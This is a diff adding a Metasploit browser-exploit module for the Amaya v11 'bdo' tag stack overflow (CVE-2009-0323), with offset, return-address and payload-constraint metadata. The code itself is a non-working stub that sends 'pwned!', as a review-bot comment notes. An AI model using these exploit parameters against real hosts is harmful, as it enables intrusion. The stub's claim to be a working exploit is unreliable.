diff --git a/modules/exploits/windows/browser/amaya_bdo.rb b/modules/exploits/windows/browser/amaya_bdo.rb
new file mode 100644
index 0000000000..028558a33b
--- /dev/null
+++ b/modules/exploits/windows/browser/amaya_bdo.rb
@@ -0,0 +1,84 @@
+##
+# $Id: amaya_bdo.rb
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Amaya Browser v11.0 bdo tag overflow',
+ 'Description' => %q{
+ This module exploits a stack overflow in the Amaya v11 Browser.
+ By sending an overly long string to the "bdo"
+ tag, an attacker may be able to execute arbitrary code.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'dookie, original exploit by Rob Carter' ],
+ 'Version' => '$Revision: 6812 $',
+ 'References' =>
+ [
+ [ 'CVE', '2009-0323' ],
+ [ 'OSVDB', '55721' ],
+ [ 'BID', '33046, 33047' ],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 970,
+ 'BadChars' => "\x00",
+ 'StackAdjustment' => -3500,
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Amaya Browser v11', { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll
+ ],
+ 'DisclosureDate' => 'Jan 28 2009',
+ 'DefaultTarget' => 0))
+ end
+
+
+ def on_request_uri(cli, request)
+ # Re-generate the payload
+ return if ((p = regenerate_payload(cli)) == nil)
+
+ # Set the exploit buffer
+ sploit = "pwned!"
+
+ print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+ # Transmit the response to the client
+ send_response_html(cli, sploit)
+
+ # Handle the payload
+ handler(cli)
+ end
+
+end
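Review bot: The payload `p` captured on the `return if ((p = regenerate_payload(cli)) == nil)` line in on_request_uri is never referenced again, and the response body is the constant `sploit = "pwned!"`, so the target's `Offset`/`Ret` metadata, the `Payload` constraints and the trailing `handler(cli)` describe behaviour this code does not have; the module's Name/Description should say it is a stub, or the metadata should not advertise a working target. The nil comparison is also un-idiomatic Ruby — `return unless (p = regenerate_payload(cli))` expresses the same guard. The `'BID'` reference packs two ids into one string, `[ 'BID', '33046, 33047' ]`; each id needs its own entry, `[ 'BID', '33046' ], [ 'BID', '33047' ]`, otherwise the generated reference link will not resolve. The `$Id: amaya_bdo.rb` header is also missing the revision/date fields the other modules carry, presumably because the keyword was never expanded.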